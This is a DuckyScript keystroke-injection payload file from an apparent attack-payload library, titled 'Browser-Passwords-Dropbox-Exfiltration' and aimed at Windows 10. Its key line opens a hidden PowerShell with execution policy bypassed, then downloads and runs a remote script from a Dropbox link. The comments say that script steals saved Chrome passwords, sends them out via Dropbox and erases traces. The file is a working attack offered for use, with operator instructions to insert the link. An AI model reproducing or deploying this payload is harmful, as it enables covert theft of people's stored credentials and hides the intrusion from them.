Path: blob/master/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
2968 views
REM #########################################################################################################1REM # | #2REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #3REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #4REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #5REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #6REM # Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #7REM # Mode : HID | |_| |___/ #8REM # Props : I am Jakoby, NULLSESSION0X | #9REM # | #10REM #########################################################################################################1112REM Title: Browser-Passwords-Dropbox-Exfiltration13REM Author: DIYS.py14REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.15REM Then it cleans up traces of what you have done after.16REM Target: Windows 10 (PowerShell + Chrome)17REM Version: 1.018REM Category: Credentials, Exfiltration192021DELAY 300022GUI r23DELAY 25024STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl2526REM Remember to replace the link with your DropBox shared link for the intended file to download27REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly282930